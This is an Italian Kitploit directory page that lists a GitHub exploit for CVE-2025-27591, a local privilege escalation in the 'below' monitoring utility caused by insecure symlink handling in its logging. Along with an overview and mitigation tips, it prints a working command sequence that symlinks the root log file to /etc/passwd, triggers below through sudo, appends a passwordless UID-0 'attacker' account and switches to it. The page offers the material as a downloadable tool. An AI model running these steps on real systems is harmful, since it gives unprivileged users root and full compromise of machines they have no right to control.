Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-27591 — Elevazione dei privilegi locale per CVE-2025-27591, che sfrutta la gestione non sicura dei symlink nella registrazione (logging) dell'utility sottostante per sovrascrivere file arbitrari come root. | Kitploit
Strumenti/GitHubGitHub/krn966/cve-2025-27591
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploit
GitHubkrn966/cve-2025-27591

CVE-2025-27591

Elevazione dei privilegi locale per CVE-2025-27591, che sfrutta la gestione non sicura dei symlink nella registrazione (logging) dell'utility sottostante per sovrascrivere file arbitrari come root.

Vedi Repository
10 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-27591 - Escalata dei privilegi tramite gestione non sicura dei log

Panoramica

CVE-2025-27591 è una vulnerabilità di escalation locale dei privilegi nell'utility below (versioni precedenti alla release corretta) causata da gestione non sicura dei link simbolici all'interno del suo meccanismo di logging. Gli attaccanti con accesso locale possono sfruttare questa falla per sovrascrivere file arbitrari come utente root, portando a una completa escalation dei privilegi.

Dettagli della vulnerabilità

Lo strumento below scrive i log in /var/log/below/ senza validare correttamente i link simbolici. Pre-creando un symlink che punta a un file sensibile (ad es. /etc/passwd), un attaccante può iniettare contenuto arbitrario con privilegi elevati quando il processo vulnerabile viene eseguito tramite sudo.

Dimostrazione dell'exploit

root@kitploit:~
# Verifica se la directory dei log esiste
test -d /var/log/below && ls -ld /var/log/below

# Rimuovi il file di log esistente e crea un symlink malevolo
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

# Prepara una voce passwd malevola
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker

# Attiva il comportamento vulnerabile tramite sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log

# Passa al nuovo utente con privilegi root
su attacker

Impatto

Lo sfruttamento riuscito concede privilegi root a un attaccante locale non privilegiato, consentendo il pieno compromesso del sistema.

Mitigazione

  • Applicare immediatamente la patch del fornitore quando disponibile.
  • Limitare l'accesso alla directory /var/log/below/.
  • Validare i percorsi dei file di log prima della scrittura per evitare di seguire link simbolici.
Scarica lo strumento